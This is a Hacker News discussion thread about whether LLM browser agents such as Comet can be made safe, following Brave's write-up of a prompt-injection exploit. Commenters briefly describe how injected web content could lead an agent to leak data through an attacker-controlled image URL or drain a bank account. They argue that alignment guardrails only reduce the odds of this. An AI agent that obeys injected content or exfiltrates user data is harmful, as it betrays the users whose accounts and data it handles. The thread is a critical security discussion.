←back to thread

645 points helloplanets | 1 comments | | HN request time: 0s | source
Show context
ec109685 ◴[] No.45005397[source]
It’s obviously fundamentally unsafe when Google, OpenAI and Anthropic haven’t released the same feature and instead use a locked down VM with no cookies to browse the web.

LLM within a browser that can view data across tabs is the ultimate “lethal trifecta”.

Earlier discussion: https://news.ycombinator.com/item?id=44847933

It’s interesting that in Brave’s post describing this exploit, they didn’t reach the fundamental conclusion this is a bad idea: https://brave.com/blog/comet-prompt-injection/

Instead they believe model alignment, trying to understand when a user is doing a dangerous task, etc. will be enough. The only good mitigation they mention is that the agent should drop privileges, but it’s just as easy to hit an attacker controlled image url to leak data as it is to send an email.

replies(7): >>45005444 #>>45005853 #>>45006130 #>>45006210 #>>45006263 #>>45006384 #>>45006571 #
snet0 ◴[] No.45005853[source]
> Instead they believe model alignment, trying to understand when a user is doing a dangerous task, etc. will be enough.

Maybe I have a fundamental misunderstanding, but I feel like hoping that model alignment and in-model guardrails are statistical preventions, ie you'll reduce the odds to some number of zeroes preceeding the 1. These things should literally never be able to happen, though. It's a fools errand to hope that you'll get to a model where there is no value in the input space that maps to <bad thing you really don't want>. Even if you "stack" models, having a safety-check model act on the output of your larger model, you're still just multiplying odds.

replies(5): >>45006201 #>>45006251 #>>45006358 #>>45007218 #>>45007846 #
zulban ◴[] No.45007218[source]
"These things should literally never be able to happen"

If we consider "humans using a bank website" and apply the same standard, then we'd never have online banking at all. People have brain farts. You should ask yourself if the failure rate is useful, not if it meets a made up perfection that we don't even have with manual human actions.

replies(3): >>45007312 #>>45007425 #>>45007768 #
echelon ◴[] No.45007312[source]
The vast majority of humans would fall to bad security.

I think we should continue experimenting with LLMs and AI. Evolution is littered with the corpses of failed experiments. It would be a shame if we stopped innovating and froze things with the status quo because we were afraid of a few isolated accidents.

We should encourage people that don't understand the risks not to use browsers like this. For those that do understand, they should not use financial tools with these browsers.

Caveat emptor.

Don't stall progress because "eww, AI". Humans are just as gross.

We need to make mistakes to grow.

replies(2): >>45007347 #>>45007786 #
girvo ◴[] No.45007786{3}[source]
When your “mistakes” are “a user has their bank account drained irrecoverably”, no, we don’t.
replies(1): >>45007817 #
echelon ◴[] No.45007817{4}[source]
So let's stop building browser agents?

This is a hypothetical Reddit comment that got Tweeted for attention. The to-date blast radius of this is zero.

What you're looking at now is the appropriate level of concern.

Let people build the hacky pizza ordering automations so we can find the utility sweet spots and then engineer more robust systems.

replies(4): >>45009276 #>>45009412 #>>45012308 #>>45018274 #
1. recursive ◴[] No.45018274{5}[source]
> So let's stop building browser agents?

The phrasing of this seems to imply that you think this is obviously ridiculous to the point that you can just say it ironically. But I actually think that's a good idea.